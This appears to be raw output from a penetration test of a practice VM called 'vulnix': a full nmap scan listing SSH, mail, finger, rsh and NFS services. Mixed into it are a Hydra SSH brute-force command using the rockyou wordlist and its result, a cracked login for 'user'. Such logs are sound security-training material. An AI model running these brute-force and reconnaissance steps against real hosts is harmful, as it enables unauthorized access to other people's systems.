# Nmap 7.93 scan initiated Mon Oct 23 07:25:37 2023 as: nmap -sC -sV -A -p- -oA nmap 192.168.123.142
Nmap scan report for 192.168.123.142
Host is up (0.00046s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 10cd9ea0e4e030243ebd675f754a33bf (DSA)
|   2048 bcf924072fcb76800d27a648520a243a (RSA)
|_  256 4dbb4ac118e8dad1826f58529cee345f (ECDSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2023-10-23T11:26:22+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after:  2022-08-31T17:40:12
79/tcp    open  finger     Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open  pop3       Dovecot pop3d
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_pop3-capabilities: TOP PIPELINING RESP-CODES SASL STLS UIDL CAPA
|_ssl-date: 2023-10-23T11:26:22+00:00; +8s from scanner time.
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      36189/tcp6  mountd
|   100005  1,2,3      37197/udp6  mountd
|   100005  1,2,3      49334/udp   mountd
|   100005  1,2,3      58079/tcp   mountd
|   100021  1,3,4      37333/tcp6  nlockmgr
|   100021  1,3,4      43313/udp   nlockmgr
|   100021  1,3,4      49216/udp6  nlockmgr
|   100021  1,3,4      55744/tcp   nlockmgr
|   100024  1          46651/udp   status
|   100024  1          52330/tcp   status
|   100024  1          57144/tcp6  status
|   100024  1          57389/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_imap-capabilities: STARTTLS ENABLE more have post-login listed ID capabilities LITERAL+ SASL-IR LOGINDISABLEDA0001 LOGIN-REFERRALS OK IMAP4rev1 Pre-login IDLE
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2023-10-23T11:26:22+00:00; +8s from scanner time.
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login      OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imap   Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_imap-capabilities: IMAP4rev1 ENABLE more have post-login ID listed capabilities SASL-IR LITERAL+ LOGIN-REFERRALS OK AUTH=PLAINA0001 Pre-login IDLE
|_ssl-date: 2023-10-23T11:26:22+00:00; +8s from scanner time.
995/tcp   open  ssl/pop3   Dovecot pop3d
|_pop3-capabilities: TOP PIPELINING RESP-CODES SASL(PLAIN) USER UIDL CAPA
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2023-10-23T11:26:22+00:00; +8s from scanner time.
2049/tcp  open  nfs_acl    2-3 (RPC #100227)
43762/tcp open  mountd     1-3 (RPC #100005)
52330/tcp open  status     1 (RPC #100024)
55744/tcp open  nlockmgr   1-4 (RPC #100021)
58079/tcp open  mountd     1-3 (RPC #100005)
59748/tcp open  mountd     1-3 (RPC #100005)
MAC Address: 00:0C:29:78:E7:F3 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7s, deviation: 0s, median: 7s

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.123.142


[22][ssh] host: 192.168.123.142   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-23 08:26:27
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/cyber-struggle/linux_makine]
└─# hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.123.142 ssh -V



OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 23 07:26:14 2023 -- 1 IP address (1 host up) scanned in 37.80 seconds
